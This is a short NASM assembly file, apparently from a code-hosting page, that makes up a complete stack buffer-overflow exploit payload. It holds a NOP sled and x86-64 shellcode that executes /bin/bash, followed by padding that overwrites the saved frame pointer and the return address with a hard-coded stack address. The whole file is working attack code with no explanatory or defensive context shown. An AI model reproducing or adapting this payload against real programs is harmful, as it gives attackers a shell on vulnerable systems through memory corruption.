24 lines
480 B
NASM
24 lines
480 B
NASM
|
bits 64
|
||
|
|
|
||
|
|
global _start
|
||
|
|
_start:
|
||
|
|
|
||
|
|
times 128 nop
|
||
|
|
|
||
|
|
; 59 sys_execve const char *filename const char *const argv[] const char *const envp[]
|
||
|
|
; (rdi, rsi, rdx, r10, r8, r9)
|
||
|
|
mov rax, 59
|
||
|
|
lea rdi, [rel binbash]
|
||
|
|
xor rsi, rsi
|
||
|
|
xor rdx, rdx
|
||
|
|
syscall
|
||
|
|
|
||
|
|
times 5 nop
|
||
|
|
|
||
|
|
binbash:
|
||
|
|
db '/bin/bash', 0x00
|
||
|
|
|
||
|
|
ALIGN 512 ; 512-byte alignment for this part
|
||
|
|
times 8 nop ; overwrite saved rbp
|
||
|
|
dq 0x7fffffffdcd0 ; overwrite rip ([rbp+8])
|